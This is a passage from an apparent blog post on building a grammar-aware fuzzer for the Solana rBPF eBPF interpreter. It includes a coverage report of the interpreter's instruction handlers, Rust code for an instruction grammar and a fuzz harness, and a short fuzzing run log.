  820|     15|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u64);
                                      ^5
  821|      5|                    reg[dst] = unsafe { *host_ptr as u64 };
  822|       |                },
  823|       |
  824|       |                // BPF_ST class
  825|       |                ebpf::ST_B_IMM   => {
  826|     26|                    let vm_addr = (reg[dst] as i64).wrapping_add( insn.off as i64) as u64;
  827|     26|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u8);
                                      ^20
  828|     20|                    unsafe { *host_ptr = insn.imm as u8 };
  829|       |                },
  830|       |                ebpf::ST_H_IMM   => {
  831|     23|                    let vm_addr = (reg[dst] as i64).wrapping_add(insn.off as i64) as u64;
  832|     23|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u16);
                                      ^13
  833|     13|                    unsafe { *host_ptr = insn.imm as u16 };
  834|       |                },
  835|       |                ebpf::ST_W_IMM   => {
  836|     12|                    let vm_addr = (reg[dst] as i64).wrapping_add(insn.off as i64) as u64;
  837|     12|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u32);
                                      ^5
  838|      5|                    unsafe { *host_ptr = insn.imm as u32 };
  839|       |                },
  840|       |                ebpf::ST_DW_IMM  => {
  841|     17|                    let vm_addr = (reg[dst] as i64).wrapping_add(insn.off as i64) as u64;
  842|     17|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u64);
                                      ^11
  843|     11|                    unsafe { *host_ptr = insn.imm as u64 };
  844|       |                },
  845|       |
  846|       |                // BPF_STX class
  847|       |                ebpf::ST_B_REG   => {
  848|     17|                    let vm_addr = (reg[dst] as i64).wrapping_add(insn.off as i64) as u64;
  849|     17|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u8);
                                      ^3
  850|      3|                    unsafe { *host_ptr = reg[src] as u8 };
  851|       |                },
  852|       |                ebpf::ST_H_REG   => {
  853|     13|                    let vm_addr = (reg[dst] as i64).wrapping_add(insn.off as i64) as u64;
  854|     13|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u16);
                                      ^3
  855|      3|                    unsafe { *host_ptr = reg[src] as u16 };
  856|       |                },
  857|       |                ebpf::ST_W_REG   => {
  858|     19|                    let vm_addr = (reg[dst] as i64).wrapping_add(insn.off as i64) as u64;
  859|     19|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u32);
                                      ^7
  860|      7|                    unsafe { *host_ptr = reg[src] as u32 };
  861|       |                },
  862|       |                ebpf::ST_DW_REG  => {
  863|      8|                    let vm_addr = (reg[dst] as i64).wrapping_add(insn.off as i64) as u64;
  864|      8|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u64);
                                      ^2
  865|      2|                    unsafe { *host_ptr = reg[src] as u64 };
  866|       |                },
  867|       |
  868|       |                // BPF_ALU class
  869|  1.06k|                ebpf::ADD32_IMM  => reg[dst] = (reg[dst] as i32).wrapping_add(insn.imm as i32)   as u64,
  870|    695|                ebpf::ADD32_REG  => reg[dst] = (reg[dst] as i32).wrapping_add(reg[src] as i32)   as u64,
  871|    710|                ebpf::SUB32_IMM  => reg[dst] = (reg[dst] as i32).wrapping_sub(insn.imm as i32)   as u64,
  872|    345|                ebpf::SUB32_REG  => reg[dst] = (reg[dst] as i32).wrapping_sub(reg[src] as i32)   as u64,
  873|  1.03k|                ebpf::MUL32_IMM  => reg[dst] = (reg[dst] as i32).wrapping_mul(insn.imm as i32)   as u64,
  874|  2.07k|                ebpf::MUL32_REG  => reg[dst] = (reg[dst] as i32).wrapping_mul(reg[src] as i32)   as u64,
  875|  1.03k|                ebpf::DIV32_IMM  => reg[dst] = (reg[dst] as u32 / insn.imm as u32)               as u64,
  876|       |                ebpf::DIV32_REG  => {
  877|      4|                    if reg[src] as u32 == 0 {
  878|      2|                        return Err(EbpfError::DivideByZero(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  879|      2|                    }
  880|      2|                    reg[dst] = (reg[dst] as u32 / reg[src] as u32) as u64;
  881|       |                },
  882|       |                ebpf::SDIV32_IMM  => {
  883|    346|                    if reg[dst] as i32 == i32::MIN && insn.imm == -1 {
                                                                    ^0
  884|      0|                        return Err(EbpfError::DivideOverflow(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  885|    346|                    }
  886|    346|                    reg[dst] = (reg[dst] as i32 / insn.imm as i32) as u64;
  887|       |                }
  888|       |                ebpf::SDIV32_REG  => {
  889|     13|                    if reg[src] as i32 == 0 {
  890|      2|                        return Err(EbpfError::DivideByZero(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  891|     11|                    }
  892|     11|                    if reg[dst] as i32 == i32::MIN && reg[src] as i32 == -1 {
                                                                    ^0
  893|      0|                        return Err(EbpfError::DivideOverflow(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  894|     11|                    }
  895|     11|                    reg[dst] = (reg[dst] as i32 / reg[src] as i32) as u64;
  896|       |                },
  897|    346|                ebpf::OR32_IMM   =>   reg[dst] = (reg[dst] as u32             | insn.imm as u32) as u64,
  898|    351|                ebpf::OR32_REG   =>   reg[dst] = (reg[dst] as u32             | reg[src] as u32) as u64,
  899|    345|                ebpf::AND32_IMM  =>   reg[dst] = (reg[dst] as u32             & insn.imm as u32) as u64,
  900|  1.03k|                ebpf::AND32_REG  =>   reg[dst] = (reg[dst] as u32             & reg[src] as u32) as u64,
  901|      0|                ebpf::LSH32_IMM  =>   reg[dst] = (reg[dst] as u32).wrapping_shl(insn.imm as u32) as u64,
  902|    369|                ebpf::LSH32_REG  =>   reg[dst] = (reg[dst] as u32).wrapping_shl(reg[src] as u32) as u64,
  903|      0|                ebpf::RSH32_IMM  =>   reg[dst] = (reg[dst] as u32).wrapping_shr(insn.imm as u32) as u64,
  904|    346|                ebpf::RSH32_REG  =>   reg[dst] = (reg[dst] as u32).wrapping_shr(reg[src] as u32) as u64,
  905|    690|                ebpf::NEG32      => { reg[dst] = (reg[dst] as i32).wrapping_neg()                as u64; reg[dst] &= u32::MAX as u64; },
  906|    347|                ebpf::MOD32_IMM  =>   reg[dst] = (reg[dst] as u32             % insn.imm as u32) as u64,
  907|       |                ebpf::MOD32_REG  => {
  908|      4|                    if reg[src] as u32 == 0 {
  909|      2|                        return Err(EbpfError::DivideByZero(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  910|      2|                    }
  911|      2|                                      reg[dst] = (reg[dst] as u32            % reg[src]  as u32) as u64;
  912|       |                },
  913|  1.04k|                ebpf::XOR32_IMM  =>   reg[dst] = (reg[dst] as u32            ^ insn.imm  as u32) as u64,
  914|  2.74k|                ebpf::XOR32_REG  =>   reg[dst] = (reg[dst] as u32            ^ reg[src]  as u32) as u64,
  915|    349|                ebpf::MOV32_IMM  =>   reg[dst] = insn.imm  as u32                                as u64,
  916|  1.03k|                ebpf::MOV32_REG  =>   reg[dst] = (reg[src] as u32)                               as u64,
  917|      0|                ebpf::ARSH32_IMM => { reg[dst] = (reg[dst] as i32).wrapping_shr(insn.imm as u32) as u64; reg[dst] &= u32::MAX as u64; },
  918|      2|                ebpf::ARSH32_REG => { reg[dst] = (reg[dst] as i32).wrapping_shr(reg[src] as u32) as u64; reg[dst] &= u32::MAX as u64; },
  919|      0|                ebpf::LE         => {
  920|      0|                    reg[dst] = match insn.imm {
  921|      0|                        16 => (reg[dst] as u16).to_le() as u64,
  922|      0|                        32 => (reg[dst] as u32).to_le() as u64,
  923|      0|                        64 =>  reg[dst].to_le(),
  924|       |                        _  => {
  925|      0|                            return Err(EbpfError::InvalidInstruction(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  926|       |                        }
  927|       |                    };
  928|       |                },
  929|      0|                ebpf::BE         => {
  930|      0|                    reg[dst] = match insn.imm {
  931|      0|                        16 => (reg[dst] as u16).to_be() as u64,
  932|      0|                        32 => (reg[dst] as u32).to_be() as u64,
  933|      0|                        64 =>  reg[dst].to_be(),
  934|       |                        _  => {
  935|      0|                            return Err(EbpfError::InvalidInstruction(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  936|       |                        }
  937|       |                    };
  938|       |                },
  939|       |
  940|       |                // BPF_ALU64 class
  941|    402|                ebpf::ADD64_IMM  => reg[dst] = reg[dst].wrapping_add(insn.imm as u64),
  942|    351|                ebpf::ADD64_REG  => reg[dst] = reg[dst].wrapping_add(reg[src]),
  943|  1.12k|                ebpf::SUB64_IMM  => reg[dst] = reg[dst].wrapping_sub(insn.imm as u64),
  944|    721|                ebpf::SUB64_REG  => reg[dst] = reg[dst].wrapping_sub(reg[src]),
  945|  3.06k|                ebpf::MUL64_IMM  => reg[dst] = reg[dst].wrapping_mul(insn.imm as u64),
  946|  1.71k|                ebpf::MUL64_REG  => reg[dst] = reg[dst].wrapping_mul(reg[src]),
  947|  1.39k|                ebpf::DIV64_IMM  => reg[dst] /= insn.imm as u64,
  948|       |                ebpf::DIV64_REG  => {
  949|     23|                    if reg[src] == 0 {
  950|     12|                        return Err(EbpfError::DivideByZero(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  951|     11|                    }
  952|     11|                                    reg[dst] /= reg[src];
  953|       |                },
  954|       |                ebpf::SDIV64_IMM  => {
  955|  1.40k|                    if reg[dst] as i64 == i64::MIN && insn.imm == -1 {
                                                                    ^0
  956|      0|                        return Err(EbpfError::DivideOverflow(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  957|  1.40k|                    }
  958|  1.40k|
  959|  1.40k|                    reg[dst] = (reg[dst] as i64 / insn.imm) as u64
  960|       |                }
  961|       |                ebpf::SDIV64_REG  => {
  962|     12|                    if reg[src] == 0 {
  963|      5|                        return Err(EbpfError::DivideByZero(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  964|      7|                    }
  965|      7|                    if reg[dst] as i64 == i64::MIN && reg[src] as i64 == -1 {
                                                                    ^0
  966|      0|                        return Err(EbpfError::DivideOverflow(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  967|      7|                    }
  968|      7|                    reg[dst] = (reg[dst] as i64 / reg[src] as i64) as u64;
  969|       |                },
  970|    838|                ebpf::OR64_IMM   => reg[dst] |=  insn.imm as u64,
  971|  1.37k|                ebpf::OR64_REG   => reg[dst] |=  reg[src],
  972|  2.14k|                ebpf::AND64_IMM  => reg[dst] &=  insn.imm as u64,
  973|  4.47k|                ebpf::AND64_REG  => reg[dst] &=  reg[src],
  974|      0|                ebpf::LSH64_IMM  => reg[dst] = reg[dst].wrapping_shl(insn.imm as u32),
  975|  1.73k|                ebpf::LSH64_REG  => reg[dst] = reg[dst].wrapping_shl(reg[src] as u32),
  976|      0|                ebpf::RSH64_IMM  => reg[dst] = reg[dst].wrapping_shr(insn.imm as u32),
  977|  1.03k|                ebpf::RSH64_REG  => reg[dst] = reg[dst].wrapping_shr(reg[src] as u32),
  978|  5.59k|                ebpf::NEG64      => reg[dst] = (reg[dst] as i64).wrapping_neg() as u64,
  979|  2.85k|                ebpf::MOD64_IMM  => reg[dst] %= insn.imm  as u64,
  980|       |                ebpf::MOD64_REG  => {
  981|      3|                    if reg[src] == 0 {
  982|      2|                        return Err(EbpfError::DivideByZero(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  983|      1|                    }
  984|      1|                                    reg[dst] %= reg[src];
  985|       |                },
  986|  2.28k|                ebpf::XOR64_IMM  => reg[dst] ^= insn.imm as u64,
  987|  1.41k|                ebpf::XOR64_REG  => reg[dst] ^= reg[src],
  988|    383|                ebpf::MOV64_IMM  => reg[dst] =  insn.imm as u64,
  989|  4.24k|                ebpf::MOV64_REG  => reg[dst] =  reg[src],
  990|      0|                ebpf::ARSH64_IMM => reg[dst] = (reg[dst] as i64).wrapping_shr(insn.imm as u32) as u64,
  991|    357|                ebpf::ARSH64_REG => reg[dst] = (reg[dst] as i64).wrapping_shr(reg[src] as u32) as u64,
  992|       |
  993|       |                // BPF_JMP class
  994|  4.43k|                ebpf::JA         =>                                          { next_pc = (next_pc as isize + insn.off as isize) as usize; },
  995|     10|                ebpf::JEQ_IMM    => if  reg[dst] == insn.imm as u64          { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^0
  996|  1.36k|                ebpf::JEQ_REG    => if  reg[dst] == reg[src]                 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^1.36k                                                        ^2
  997|  4.16k|                ebpf::JGT_IMM    => if  reg[dst] >  insn.imm as u64          { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^1.42k                                                        ^2.74k
  998|  1.73k|                ebpf::JGT_REG    => if  reg[dst] >  reg[src]                 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^1.39k                                                        ^343
  999|    343|                ebpf::JGE_IMM    => if  reg[dst] >= insn.imm as u64          { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^0
 1000|  2.04k|                ebpf::JGE_REG    => if  reg[dst] >= reg[src]                 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^1.70k                                                        ^342
 1001|  2.04k|                ebpf::JLT_IMM    => if  reg[dst] <  insn.imm as u64          { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^2.04k                                                        ^1
 1002|    342|                ebpf::JLT_REG    => if  reg[dst] <  reg[src]                 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^0
 1003|  1.02k|                ebpf::JLE_IMM    => if  reg[dst] <= insn.imm as u64          { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                                                                                         ^0
 1004|  2.38k|                ebpf::JLE_REG    => if  reg[dst] <= reg[src]                 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^2.38k                                                        ^1
 1005|  1.76k|                ebpf::JSET_IMM   => if  reg[dst] &  insn.imm as u64 != 0     { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^1.42k                                                        ^347
 1006|    686|                ebpf::JSET_REG   => if  reg[dst] &  reg[src]        != 0     { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^0
 1007|  6.48k|                ebpf::JNE_IMM    => if  reg[dst] != insn.imm as u64          { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                                                                                         ^0
 1008|  2.44k|                ebpf::JNE_REG    => if  reg[dst] != reg[src]                 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^1.40k                                                        ^1.03k
 1009|  18.1k|                ebpf::JSGT_IMM   => if  reg[dst] as i64 >   insn.imm  as i64 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^17.7k                                                        ^363
 1010|  2.08k|                ebpf::JSGT_REG   => if  reg[dst] as i64 >   reg[src]  as i64 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^2.07k                                                        ^12
 1011|  14.3k|                ebpf::JSGE_IMM   => if  reg[dst] as i64 >=  insn.imm  as i64 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^12.9k                                                        ^1.37k
 1012|  3.45k|                ebpf::JSGE_REG   => if  reg[dst] as i64 >=  reg[src] as i64  { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^3.44k                                                        ^12
 1013|  1.36k|                ebpf::JSLT_IMM   => if (reg[dst] as i64) <  insn.imm  as i64 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^1.02k                                                        ^346
 1014|      2|                ebpf::JSLT_REG   => if (reg[dst] as i64) <  reg[src] as i64  { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^0
 1015|  2.05k|                ebpf::JSLE_IMM   => if (reg[dst] as i64) <= insn.imm  as i64 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^2.04k                                                        ^14
 1016|  6.83k|                ebpf::JSLE_REG   => if (reg[dst] as i64) <= reg[src] as i64  { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^6.83k                                                        ^7
 1017|       |
 1018|       |                ebpf::CALL_REG   => {
 1019|      0|                    let target_address = reg[insn.imm as usize];
 1020|      0|                    reg[ebpf::FRAME_PTR_REG] =
 1021|      0|                        self.stack.push(&reg[ebpf::FIRST_SCRATCH_REG..ebpf::FIRST_SCRATCH_REG + ebpf::SCRATCH_REGS], next_pc)?;
 1022|      0|                    if target_address < self.program_vm_addr {
 1023|      0|                        return Err(EbpfError::CallOutsideTextSegment(pc + ebpf::ELF_INSN_DUMP_OFFSET, target_address / ebpf::INSN_SIZE as u64 * ebpf::INSN_SIZE as u64));
 1024|      0|                    }
 1025|      0|                    next_pc = self.check_pc(pc, (target_address - self.program_vm_addr) as usize / ebpf::INSN_SIZE)?;
 1026|       |                },
 1027|       |
 1028|       |                // Do not delegate the check to the verifier, since registered functions can be
 1029|       |                // changed after the program has been verified.
 1030|       |                ebpf::CALL_IMM => {
 1031|     22|                    let mut resolved = false;
 1032|     22|                    let (syscalls, calls) = if config.static_syscalls {
 1033|     22|                        (insn.src == 0, insn.src != 0)
 1034|       |                    } else {
 1035|      0|                        (true, true)
 1036|       |                    };
 1037|       |
 1038|     22|                    if syscalls {
 1039|      2|                        if let Some(syscall) = self.executable.get_syscall_registry().lookup_syscall(insn.imm as u32) {
                                                  ^0
 1040|      0|                            resolved = true;
 1041|      0|
 1042|      0|                            if config.enable_instruction_meter {
 1043|      0|                                let _ = instruction_meter.consume(*last_insn_count);
 1044|      0|                            }
 1045|      0|                            *last_insn_count = 0;
 1046|      0|                            let mut result: ProgramResult<E> = Ok(0);
 1047|      0|                            (unsafe { std::mem::transmute::<u64, SyscallFunction::<E, *mut u8>>(syscall.function) })(
 1048|      0|                                self.syscall_context_objects[SYSCALL_CONTEXT_OBJECTS_OFFSET + syscall.context_object_slot],
 1049|      0|                                reg[1],
 1050|      0|                                reg[2],
 1051|      0|                                reg[3],
 1052|      0|                                reg[4],
 1053|      0|                                reg[5],
 1054|      0|                                &self.memory_mapping,
 1055|      0|                                &mut result,
 1056|      0|                            );
 1057|      0|                            reg[0] = result?;
 1058|      0|                            if config.enable_instruction_meter {
 1059|      0|                                remaining_insn_count = instruction_meter.get_remaining();
 1060|      0|                            }
 1061|      2|                        }
 1062|     20|                    }
 1063|       |
 1064|     22|                    if calls {
 1065|     20|                        if let Some(target_pc) = self.executable.lookup_bpf_function(insn.imm as u32) {
                                                  ^0
 1066|      0|                            resolved = true;
 1067|       |
 1068|       |                            // make BPF to BPF call
 1069|      0|                            reg[ebpf::FRAME_PTR_REG] =
 1070|      0|                                self.stack.push(&reg[ebpf::FIRST_SCRATCH_REG..ebpf::FIRST_SCRATCH_REG + ebpf::SCRATCH_REGS], next_pc)?;
 1071|      0|                            next_pc = self.check_pc(pc, target_pc)?;
 1072|     20|                        }
 1073|      2|                    }
 1074|       |
 1075|     22|                    if !resolved {
 1076|     22|                        if config.disable_unresolved_symbols_at_runtime {
 1077|      6|                            return Err(EbpfError::UnsupportedInstruction(pc + ebpf::ELF_INSN_DUMP_OFFSET));
 1078|       |                        } else {
 1079|     16|                            self.executable.report_unresolved_symbol(pc)?;
 1080|       |                        }
 1081|      0|                    }
 1082|       |                }
 1083|       |
 1084|       |                ebpf::EXIT => {
 1085|     14|                    match self.stack.pop::<E>() {
 1086|      0|                        Ok((saved_reg, frame_ptr, ptr)) => {
 1087|      0|                            // Return from BPF to BPF call
 1088|      0|                            reg[ebpf::FIRST_SCRATCH_REG
 1089|      0|                                ..ebpf::FIRST_SCRATCH_REG + ebpf::SCRATCH_REGS]
 1090|      0|                                .copy_from_slice(&saved_reg);
 1091|      0|                            reg[ebpf::FRAME_PTR_REG] = frame_ptr;
 1092|      0|                            next_pc = self.check_pc(pc, ptr)?;
 1093|       |                        }
 1094|       |                        _ => {
 1095|     14|                            return Ok(reg[0]);
 1096|       |                        }
 1097|       |                    }
 1098|       |                }
 1099|      0|                _ => return Err(EbpfError::UnsupportedInstruction(pc + ebpf::ELF_INSN_DUMP_OFFSET)),
 1100|       |            }
 1101|       |
 1102|   135k|            if config.enable_instruction_meter && *last_insn_count >= remaining_insn_count {
 1103|       |                // Use `pc + instruction_width` instead of `next_pc` here because jumps and calls don't continue at the end of this instruction
 1104|    130|                return Err(EbpfError::ExceededMaxInstructions(pc + instruction_width + ebpf::ELF_INSN_DUMP_OFFSET, initial_insn_count));
 1105|   135k|            }
 1106|       |        }
 1107|       |
 1108|    419|        Err(EbpfError::ExecutionOverrun(
 1109|    419|            next_pc + ebpf::ELF_INSN_DUMP_OFFSET,
 1110|    419|        ))
 1111|    763|    }

Unfortunately, this fuzzer doesn’t seem to achieve the coverage we’d like. Several instructions are missed entirely (note the zero coverage on some branches of the match), and more interesting behaviour, such as BPF-to-BPF calls and syscalls, is never reached at all. This is largely because throwing random bytes at any parser just isn’t going to be effective; most things will get caught at the verification stage, and very little will actually test the program.

We must improve this before we continue or we’ll be waiting forever for our fuzzer to find useful bugs.

At this point, we’re about two hours into development.

The smart fuzzer

eBPF is quite a simple instruction set; you can read the whole definition in just a few pages. Knowing this, why don’t we constrain our input to just these instructions? This approach is commonly called “grammar-aware” fuzzing because the inputs are constrained to some grammar. It is a very powerful concept, and is used to test a variety of large targets which have strict parsing rules.

To create this grammar-aware fuzzer, I inspected the helpfully-named insn_builder.rs provided by the crate, which would allow me to build instructions. Now, all I needed to do was represent all the different instructions. By cross-referencing the eBPF documentation, we can represent each possible operation in a single enum. You can see the whole grammar.rs in the rBPF repo if you wish, but the two most relevant sections are provided below.

Defining the enum that represents all instructions
#[derive(arbitrary::Arbitrary, Debug, Eq, PartialEq)]
pub enum FuzzedOp {
    Add(Source),
    Sub(Source),
    Mul(Source),
    Div(Source),
    BitOr(Source),
    BitAnd(Source),
    LeftShift(Source),
    RightShift(Source),
    Negate,
    Modulo(Source),
    BitXor(Source),
    Mov(Source),
    SRS(Source),
    SwapBytes(Endian),
    Load(MemSize),
    LoadAbs(MemSize),
    LoadInd(MemSize),
    LoadX(MemSize),
    Store(MemSize),
    StoreX(MemSize),
    Jump,
    JumpC(Cond, Source),
    Call,
    Exit,
}
Translating FuzzedOps to BpfCode
pub type FuzzProgram = Vec<FuzzedInstruction>;

pub fn make_program(prog: &FuzzProgram, arch: Arch) -> BpfCode {
    let mut code = BpfCode::default();
    for inst in prog {
        match inst.op {
            FuzzedOp::Add(src) => code
                .add(src, arch)
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
            FuzzedOp::Sub(src) => code
                .sub(src, arch)
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
            FuzzedOp::Mul(src) => code
                .mul(src, arch)
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
            FuzzedOp::Div(src) => code
                .div(src, arch)
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
            FuzzedOp::BitOr(src) => code
                .bit_or(src, arch)
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
            FuzzedOp::BitAnd(src) => code
                .bit_and(src, arch)
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
            FuzzedOp::LeftShift(src) => code
                .left_shift(src, arch)
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
            FuzzedOp::RightShift(src) => code
                .right_shift(src, arch)
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
            FuzzedOp::Negate => code
                .negate(arch)
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
            FuzzedOp::Modulo(src) => code
                .modulo(src, arch)
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
            FuzzedOp::BitXor(src) => code
                .bit_xor(src, arch)
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
            FuzzedOp::Mov(src) => code
                .mov(src, arch)
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
            FuzzedOp::SRS(src) => code
                .signed_right_shift(src, arch)
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
            FuzzedOp::SwapBytes(endian) => code
                .swap_bytes(endian)
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
            FuzzedOp::Load(mem) => code
                .load(mem)
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
            FuzzedOp::LoadAbs(mem) => code
                .load_abs(mem)
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
            FuzzedOp::LoadInd(mem) => code
                .load_ind(mem)
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
            FuzzedOp::LoadX(mem) => code
                .load_x(mem)
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
            FuzzedOp::Store(mem) => code
                .store(mem)
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
            FuzzedOp::StoreX(mem) => code
                .store_x(mem)
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
            FuzzedOp::Jump => code
                .jump_unconditional()
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
            FuzzedOp::JumpC(cond, src) => code
                .jump_conditional(cond, src)
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
            FuzzedOp::Call => code
                .call()
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
            FuzzedOp::Exit => code
                .exit()
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
        };
    }
    code
}

You’ll see here that our generator doesn’t really care to ensure that instructions are valid, just that they’re in the right format. For example, we don’t verify registers, addresses, jump targets, etc.; we just slap it all together and see if it works. This is to prevent over-specialisation, where our generation only produces “boring” inputs and never tests cases that would normally be considered invalid.
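
For reference, the instruction wrapper those builder calls read from looks roughly like this (the exact definition lives in grammar.rs): the operation comes from the FuzzedOp grammar, while the operands remain plain, unconstrained integers.

// Approximate shape of the wrapper in grammar.rs: nothing here forces dst/src to
// name real registers, off to be a sane jump target, or imm to be meaningful.
#[derive(arbitrary::Arbitrary, Debug, Eq, PartialEq)]
pub struct FuzzedInstruction {
    pub op: FuzzedOp,
    pub dst: u8,
    pub src: u8,
    pub off: i16,
    pub imm: i64,
}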

Okay – let’s make a fuzzer with this. The only real difference here is that our input format now uses our new FuzzProgram type instead of raw bytes:

#[derive(arbitrary::Arbitrary, Debug)]
struct FuzzData {
    template: ConfigTemplate,
    prog: FuzzProgram,
    mem: Vec<u8>,
    arch: Arch,
}
The whole fuzzer, though really it's not that different

This fuzzer represents a particular stage in development; the eventual differential fuzzer is significantly different in a few key aspects that will be discussed later.

#![feature(bench_black_box)]
#![no_main]

use std::collections::BTreeMap;
use std::hint::black_box;

use libfuzzer_sys::fuzz_target;

use grammar_aware::*;
use solana_rbpf::{
    ebpf,
    elf::{register_bpf_function, Executable},
    insn_builder::{Arch, IntoBytes},
    memory_region::MemoryRegion,
    user_error::UserError,
    verifier::check,
    vm::{EbpfVm, SyscallRegistry, TestInstructionMeter},
};

use crate::common::ConfigTemplate;

mod common;
mod grammar_aware;

#[derive(arbitrary::Arbitrary, Debug)]
struct FuzzData {
    template: ConfigTemplate,
    prog: FuzzProgram,
    mem: Vec<u8>,
    arch: Arch,
}

fuzz_target!(|data: FuzzData| {
    let prog = make_program(&data.prog, data.arch);
    let config = data.template.into();
    if check(prog.into_bytes(), &config).is_err() {
        // verify please
        return;
    }
    let mut mem = data.mem;
    let registry = SyscallRegistry::default();
    let mut bpf_functions = BTreeMap::new();
    register_bpf_function(&config, &mut bpf_functions, &registry, 0, "entrypoint").unwrap();
    let executable = Executable::<UserError, TestInstructionMeter>::from_text_bytes(
        prog.into_bytes(),
        None,
        config,
        SyscallRegistry::default(),
        bpf_functions,
    )
    .unwrap();
    let mem_region = MemoryRegion::new_writable(&mut mem, ebpf::MM_INPUT_START);
    let mut vm =
        EbpfVm::<UserError, TestInstructionMeter>::new(&executable, &mut [], vec![mem_region]).unwrap();

    drop(black_box(vm.execute_program_interpreted(
        &mut TestInstructionMeter { remaining: 1 << 16 },
    )));
});

Evaluation

Let’s see how well this version covers our target now.

$ cargo +nightly fuzz run smart -- -max_total_time=300
... snip ...
#1449846	REDUCE cov: 1730 ft: 6369 corp: 1019/168Kb lim: 4096 exec/s: 4832 rss: 358Mb L: 267/2963 MS: 1 EraseBytes-
#1450798	NEW    cov: 1730 ft: 6370 corp: 1020/168Kb lim: 4096 exec/s: 4835 rss: 358Mb L: 193/2963 MS: 2 InsertByte-InsertRepeatedBytes-
#1451609	NEW    cov: 1730 ft: 6371 corp: 1021/168Kb lim: 4096 exec/s: 4838 rss: 358Mb L: 108/2963 MS: 1 ChangeByte-
